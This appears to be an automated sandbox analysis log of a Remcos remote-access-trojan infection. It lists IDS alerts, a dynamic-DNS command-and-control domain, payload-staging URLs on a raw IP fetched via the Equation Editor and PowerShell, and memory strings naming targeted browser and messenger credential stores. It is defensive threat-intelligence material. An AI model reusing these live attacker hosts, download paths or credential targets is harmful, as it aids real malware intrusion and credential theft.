                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49167 -> 192.210.150.29:14645
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: authurremc.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: authurremc.duckdns.org
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /550/RGBV.txt HTTP/1.1Host: 185.29.10.52Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 192.210.150.29 192.210.150.29
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: DATACLUB-SE DATACLUB-SE
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.29.10.52Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{679FD92C-7EF1-4A2F-ADE8-27F26CF6740E}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.29.10.52Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /550/RGBV.txt HTTP/1.1Host: 185.29.10.52Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: global trafficDNS traffic detected: DNS query: authurremc.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.29.10.52
                  Source: powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.29.10.52/550/RGBV.txt
                  Source: EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIF
                  Source: EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4
                  Source: EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFj
                  Source: EQNEDT32.EXE, 00000002.00000003.360658703.00000000005AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC:
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhvB683.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhvB683.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000006.00000002.386327941.000000000269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382702035.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
